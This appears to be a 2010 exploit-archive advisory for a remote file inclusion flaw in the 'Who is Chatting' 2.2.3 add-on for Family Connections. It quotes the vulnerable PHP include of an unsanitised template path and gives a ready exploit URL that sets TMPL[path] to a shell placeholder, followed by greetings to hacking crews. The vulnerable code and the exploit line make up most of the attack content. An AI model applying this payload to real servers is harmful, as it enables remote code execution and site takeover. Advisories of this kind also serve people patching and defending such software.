Family Connections Who is Chatting Add-On Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Family Connections Who is Chatting Add-On Remote File Inclusion Vulnerability
# Published : 2010-07-03
# Author : lumut--
# Previous Title : Joomla eventcal Component 1.6.4 com_eventcal Blind SQL Injection Vulnerability
# Next Title : SweetRice < 0.6.4 (fckeditor) Remote File Upload

*=======================================================
Who is Chatting 2.2.3 Remote File Include Vulnerability
=======================================================

# Author         : lumut--
# Script Details : http://www.familycms.com/downloads/details.php?file=50
# Bugs           :

<?
$chat_inc = $TMPL['path'] . "inc/chatting_inc.php";
include_once ($chat_inc);
?>

# Expl: http://server/mod_chatting/themes/default/header.php?TMPL[path]=[shell]

# Greetz & Thanks: cr4wl3r, team_elite, kisame, virusfree, doniskynet,
manadocoding*